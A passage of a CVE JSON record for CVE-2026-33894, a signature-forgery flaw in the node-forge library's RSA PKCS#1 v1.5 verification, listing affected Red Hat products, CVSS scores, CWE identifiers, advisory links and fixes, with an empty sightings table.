"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:ansible_automation_platform:2"
],
"defaultStatus": "affected",
"packageName": "automation-platform-ui",
"product": "Red Hat Ansible Automation Platform 2",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:apache_camel_hawtio:4"
],
"defaultStatus": "unaffected",
"packageName": "io.hawt-project",
"product": "Red Hat build of Apache Camel - HawtIO 4",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:service_registry:2"
],
"defaultStatus": "affected",
"packageName": "io.apicurio-apicurio-registry",
"product": "Red Hat build of Apicurio Registry 2",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:podman_desktop:1"
],
"defaultStatus": "affected",
"packageName": "podman-desktop-macos-1-0",
"product": "Red Hat Build of Podman Desktop",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:podman_desktop:1"
],
"defaultStatus": "affected",
"packageName": "podman-desktop-windows-1-0",
"product": "Red Hat Build of Podman Desktop",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_data_grid:8"
],
"defaultStatus": "affected",
"packageName": "org.infinispan-infinispan-console",
"product": "Red Hat Data Grid 8",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:10"
],
"defaultStatus": "unaffected",
"packageName": "grafana",
"product": "Red Hat Enterprise Linux 10",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:8"
],
"defaultStatus": "unaffected",
"packageName": "pcs",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:9"
],
"defaultStatus": "unaffected",
"packageName": "grafana",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:9"
],
"defaultStatus": "affected",
"packageName": "pcs",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_fuse:7"
],
"defaultStatus": "affected",
"packageName": "io.apicurio-apicurito",
"product": "Red Hat Fuse 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_fuse:7"
],
"defaultStatus": "affected",
"packageName": "io.syndesis-syndesis-parent",
"product": "Red Hat Fuse 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_bpms_platform:7"
],
"defaultStatus": "unaffected",
"packageName": "org.uberfire-uberfire-parent",
"product": "Red Hat Process Automation 7",
"vendor": "Red Hat"
}
],
"datePublic": "2026-03-27T20:45:49.583Z",
"descriptions": [
{
"lang": "en",
"value": "A flaw was found in Forge (also called `node-forge`), a JavaScript implementation of Transport Layer Security. A remote attacker could exploit weaknesses in the RSASSA PKCS#1 v1.5 signature verification process. By crafting malicious signatures that include extra data within the ASN structure and do not meet padding requirements, an attacker can bypass signature validation. This allows for the creation of forged signatures that appear legitimate, potentially compromising the integrity and authenticity of communications."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Important"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-347",
"description": "Improper Verification of Cryptographic Signature",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-07-15T01:05:31.752Z",
"orgId": "0b0ca135-0b70-47e7-9f44-1890c2a1c46c",
"shortName": "redhat-SADP"
},
"references": [
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2026-33894"
},
{
"name": "RHBZ#2452464",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2452464"
},
{
"tags": [
"x_sadp-csaf-vex"
],
"url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-33894.json"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:24761"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:34342"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:9742"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:13826"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:22840"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:22629"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:21017"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:24853"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:19375"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:22465"
},
{
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2026:23361"
}
],
"solutions": [
{
"lang": "en",
"value": "RHSA-2026:24761: Red Hat Ansible Automation Platform 2.5 for RHEL 8, Red Hat Ansible Automation Platform 2.5 for RHEL 9"
},
{
"lang": "en",
"value": "RHSA-2026:34342: Cluster Observability Operator 1.5.0"
},
{
"lang": "en",
"value": "RHSA-2026:9742: Red Hat Developer Hub 1.8"
},
{
"lang": "en",
"value": "RHSA-2026:13826: Red Hat Developer Hub 1.9"
},
{
"lang": "en",
"value": "RHSA-2026:22840: Red Hat Quay 3.10"
},
{
"lang": "en",
"value": "RHSA-2026:22629: Red Hat Quay 3.12"
},
{
"lang": "en",
"value": "RHSA-2026:21017: Red Hat Quay 3.14"
},
{
"lang": "en",
"value": "RHSA-2026:24853: Red Hat Quay 3.15"
},
{
"lang": "en",
"value": "RHSA-2026:19375: Red Hat Quay 3.16"
},
{
"lang": "en",
"value": "RHSA-2026:22465: Red Hat Quay 3.17"
},
{
"lang": "en",
"value": "RHSA-2026:23361: Red Hat Quay 3.9"
}
],
"timeline": [
{
"lang": "en",
"time": "2026-03-27T21:02:52.462Z",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2026-03-27T20:45:49.583Z",
"value": "Made public."
}
],
"title": "node-forge: Forge: Signature Forgery via Weak RSASSA PKCS#1 v1.5 Verification",
"workarounds": [
{
"lang": "en",
"value": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability."
}
],
"x_adpType": "supplier",
"x_generator": {
"engine": "sadp-cli 1.0.0"
}
}
],
"cna": {
"affected": [
{
"product": "forge",
"vendor": "digitalbazaar",
"versions": [
{
"status": "affected",
"version": "\u003c 1.4.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.4.0, RSASSA PKCS#1 v1.5 signature verification accepts forged signatures for low public exponent keys (e=3). Attackers can forge signatures by stuffing \u201cgarbage\u201d bytes within the ASN structure in order to construct a signature that passes verification, enabling Bleichenbacher style forgery. This issue is similar to CVE-2022-24771, but adds bytes in an addition field within the ASN structure, rather than outside of it. Additionally, forge does not validate that signatures include a minimum of 8 bytes of padding as defined by the specification, providing attackers additional space to construct Bleichenbacher forgeries. Version 1.4.0 patches the issue."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-347",
"description": "CWE-347: Improper Verification of Cryptographic Signature",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-20",
"description": "CWE-20: Improper Input Validation",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-03-27T20:45:49.583Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp"
},
{
"name": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp"
},
{
"name": "https://datatracker.ietf.org/doc/html/rfc2313#section-8",
"tags": [
"x_refsource_MISC"
],
"url": "https://datatracker.ietf.org/doc/html/rfc2313#section-8"
},
{
"name": "https://mailarchive.ietf.org/arch/msg/openpgp/5rnE9ZRN1AokBVj3VqblGlP63QE",
"tags": [
"x_refsource_MISC"
],
"url": "https://mailarchive.ietf.org/arch/msg/openpgp/5rnE9ZRN1AokBVj3VqblGlP63QE"
},
{
"name": "https://www.rfc-editor.org/rfc/rfc8017.html",
"tags": [
"x_refsource_MISC"
],
"url": "https://www.rfc-editor.org/rfc/rfc8017.html"
}
],
"source": {
"advisory": "GHSA-ppp5-5v6c-4jwp",
"discovery": "UNKNOWN"
},
"title": "Forge has signature forgery in RSA-PKCS due to ASN.1 extra field"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-33894",
"datePublished": "2026-03-27T20:45:49.583Z",
"dateReserved": "2026-03-24T15:41:47.489Z",
"dateUpdated": "2026-07-15T01:05:31.752Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.